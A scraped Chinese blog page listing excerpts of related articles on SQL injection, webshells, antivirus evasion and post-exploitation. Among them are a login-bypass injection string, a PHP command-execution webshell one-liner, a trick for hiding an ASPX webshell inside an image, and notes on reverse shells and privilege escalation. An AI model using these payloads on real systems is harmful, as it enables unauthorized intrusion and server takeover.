http://www.cnblogs.com/JemBai/archive/2012/04/18/2454905.html










































                

        

    

  



    



                



	

		

			

				
					
网络安全基础技术扫盲篇 — 常见web漏洞之SQL注入_websocket 安全漏洞sql注入

				
			

			

				

					2401_84281655的博客
				

				

					05-04
					
					1251
					
				

			

		

		

			
				
这样,构成的SQL查询语句将变为:SELECT * FROM users WHERE username = ‘’ OR ‘1’=‘1’ AND password = ‘输入的密码’;由于 ‘1’=‘1’ 这个条件始终成立,攻击者可以绕过密码验证部分,成功登录到系统,即使他们没有正确的用户名和密码组合。这是一个典型的SQL注入漏洞的例子,攻击者通过在输入中注入恶意的SQL代码改变了查询语句的逻辑结构,绕过了用户名和密码的验证。

			
		

	



                

            
              



	

		

			

				
					
记一次内网渗透测试实训总结

				
			

			

				

					qq_36410265的博客
				

				

					06-20
					
					4837
					
				

			

		

		

			
				
时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗透也还是头一次,得益于这次的内网渗透靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。物理机 (win 10) ip:172.20.10.1工具:、攻击机(kali) ip:172.20.10.129工具:、、、、、 …靶场拓扑图首先需要拿到...

			
		

	



              


  
              

                


	

		

			

				
					
拿到webshell之后的事情

				
			

			

				

					weixin_30527143的博客
				

				

					12-05
					
					1264
					
				

			

		

		

			
				
之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。

公司网站为php的站,已经拿到webshell。可以进行菜刀连接。
菜刀虚拟终端

php -m     #查看php是否有socket库,因为reGeory需要用到sockets库。

如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers...

			
		

	





	

		

			

				
					
从aspx到webshell肉鸡

				
			

			

				

					
				

				

					05-15
					
					6693
					
				

			

		

		

			
				
笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含后门的Webshell程序,众多小黑们在外面吭哧吭哧的干活,而给出后门的老板,却在后面偷着数Webshell,这种后门中的后门一般来说有二种类型,一种就是直接挂马,带来直接的收益;另外

			
		

	



		

			
		



	

		

			

				
					
aspx 版webshell

				
			

			

				

					01-16
				

			

		

		

			
				
此文件是一个是一个别人写的webshll,开发环境c#

			
		

	





	

		

			

				
					
WebShell的经验

				
			

			

				

					Air的博客
				

				

					07-28
					
					434
					
				

			

		

		

			
				
 拿WebShell的经验 通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。   首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Google或者Baidu搜索得到的,遇到ASP这样的动态网站入侵成功率是最佳的。不详细说了,这一

			
		

	





	

		

			

				
					
菜鸟拿webshell

				
			

			

				

					那年的专栏
				

				

					10-21
					
					2595
					
				

			

		

		

			
				
通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。

  首先我们要确定我们要检测的网站,可以是自己定下的某个网站,也可以是自己通过Google或者Baidu搜索得到的,遇到ASP这样的动态网站入侵成功率是最佳的。不详细说了,这一步就是选定目标网站。   然后我们

			
		

	





	

		

			

				
					
网络安全面试题汇总(附答案)

					
最新发布

				
			

			

				

					Hacker_Nightrain的博客
				

				

					02-06
					
					925
					
				

			

		

		

			
				
作为从业多年的,我深知在面试过程中面试官所关注的重点及考察的技能点。网络安全作为当前信息技术领域中非常重要的一部分,对于每一个从事网络安全工作的人员来说,不仅需要掌握一定的技术能力,更需要具备全面的综合素质。在我职业发展的过程中,我多次参与并负责面试网络安全相关岗位的候选人,同时也自己经历过多次网络安全方面的面试。通过这些经验和总结,我将为大家分享一些常见的网络安全面试题及答案,希望能对各位在网络安全领域的求职和职业发展提供一些实质性的帮助。

			
		

	





	

		

			

				
					
20年时候收集的一些信息安全岗面试题

				
			

			

				

					课嗨教育的专栏
				

				

					05-02
					
					8397
					
				

			

		

		

			
				
目录



面试一

面试二

面试三

更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-优快云博客

面试一



 

个人介绍: 
 


	自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 
	
	
	1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 
	
	
	2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 
	
	
	3、业绩/成绩: 研究类:freebuff SRC I春秋...

			
		

	





	

		

			

				
					
暴破助攻提权:ruadmin

				
			

			

				

					xiaoi123的博客
				

				

					05-28
					
					623
					
				

			

		

		

			
				
i春秋作家:yangyangwithgnu1 缘由 千辛万苦拿下webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面、扩大战果,提权,是必经之路,也是后渗透阶段成功的关键。windows 提权,常用手法包括搜寻本地明文密码、DB 命令执行提权、内核 exp 提权、dll 劫持提权、路径未带引号的服务提权、滥用高权 token 提权、三方软件提权...

			
		

	





	

		

			

				
					
aspxwebshell免杀过杀软亲自制作

				
			

			

				

					10-29
				

			

		

		

			
				
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy  f.jpg/b +x.aspx/a hez.jpg

			
		

	





	

		

			

				
					
AS_ASPX_AES_ENCODE:蚁剑AES加密通信ASPX Webshell

				
			

			

				

					07-24
				

			

		

		

			
				
AS_ASPX_AES_ENCODE
蚁剑AES加密通信ASPX Webshell
原理:

			
		

	





	

		

			

				
					
拿到一个linux下的shell之后,有用的命令整理

				
			

			

				

					weixin_33852020的博客
				

				

					08-07
					
					354
					
				

			

		

		

			
				
cat ./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /...

			
		

	





	

		

			

				
					
浅谈webshell

				
			

			

				

					明哥哥知识分享
				

				

					08-13
					
					1342
					
				

			

		

		

			
				
一. 概念
webshell是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。
攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命令执行、代码执行、数据库枚举和

			
		

	





	

		

			

				
					
获取Shell后的操作

				
			

			

				

					墨鱼菜鸡
				

				

					06-21
					
					1569
					
				

			

		

		

			
				
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。

Windows

当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?

第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...

			
		

	





	

		

			

				
					
获取shell后各种命令及操作

				
			

			

				

					2201_75387456的博客
				

				

					05-31
					
					1264
					
				

			

		

		

			
				
假设目标机器上有鼠标指针,那么说明可以输入内容,那我们就可以使用。这个时候,目标的记事本里就多出了一些内容,就是我们刚刚输入的。如果其它程序需要访问这个内网环境,就可以建立。目标机器输入东西的话,就可以获取到键盘记录。:显示自己当前系统的所有文件和文件夹。:列出当前路径下的所有文件和文件夹。指定一个自定义的变量,以确定输出格式。: 使用当前伪造的线程令牌运行进程。进行记录的导出,如果不想监听了才。:使用当前伪造的线程令牌运行进程。加载扩展后,我们可以使用基本的。当然,也可以上传很多扩展,比。

			
		

	





	

		

			

				
					
利用后台SQL查询语句拿webshell

				
			

			

				

					收集盒  Book box
				

				

					11-30
					
					1581
					
				

			

		

		

			
				
有SQL查询功能
在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥。
以下拿webshell步骤
     第一句代码
create table cmd (a varchar(50)) 
  第二句代码
 
insert into cmd (a) values ('')


			
		

	





	

		

			

				
					
ASP.NET下Webshell编译产物免杀

				
			

			

				

					2401_83799022的博客
				

				

					08-20
					
					1427
					
				

			

		

		

			
				
但编译产物会被杀导致无法连接webshell,以冰蝎aspx的webshell为例。Webshell的文件免杀可参考以下链接,通过unicode编码就可以实现。通过dnspy反编译和不断测试,以下方法的变换对于编译产物而言没有任何影响。但当有卡巴斯基等杀软时,虽然aspx、ashx、asmx文件没有被杀。7、字符串常量的拼接,如"Load"替换为"Lo"+"ad"为了保证aspx的免杀,仍使用unicode编码。通过变异的base64来编码字符串常量,如。1、unicode编码。

			
		

	





	

		

			

				
					
webshell基本原理和使用(一句话木马实践)

				
			

			

				

					m0_65853019的博客
				

				

					06-09
					
					4656
					
				

			

		

		

			
				
webshell的基本原理和使用

			
		

	





	

		

			

				
					
拿下webshell后怎么拿主机shell

				
			

			

				

					12-28
				

			

		

		

			
				
### 获取从WebShell提升到主机Shell的技术方法

#### 1. 利用命令执行功能获取交互式Shell

许多Webshell具备执行操作系统命令的功能。通过精心构造的PHP代码,可以实现从简单的命令执行到完全控制服务器的效果。

```php
<?php system($_GET['cmd']); ?>
```

上述脚本允许攻击者通过URL参数传递任意命令并获得输出结果[^2]。

#### 2. 使用反向Shell连接

为了建立更稳定的远程访问通道,可以通过创建一个持久化的反向Shell来绕过防火墙限制。这种方法通常涉及客户端和服务端两部分:

- **服务端**:部署在受控机器上等待来自目标系统的连接请求;
- **客户端**:嵌入于Webshell内部,在触发时主动发起对外部IP地址指定端口的TCP连接尝试。

一旦成功建立会话,则可获得具有更高权限级别的Bash或其他类型的交互环境。

#### 3. 提权操作

即使获得了初步的Shell访问权限,也可能受限于较低的操作系统用户身份。此时需要进一步实施提权策略,常见的手段包括但不限于寻找内核漏洞、滥用配置错误的服务程序以及利用弱密码猜测管理员账户凭证等。

需要注意的是,非法入侵他人计算机信息系统属于违法行为,并且违反道德准则和技术社区的行为规范。以上信息仅用于教育目的和合法的安全测试活动之中。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值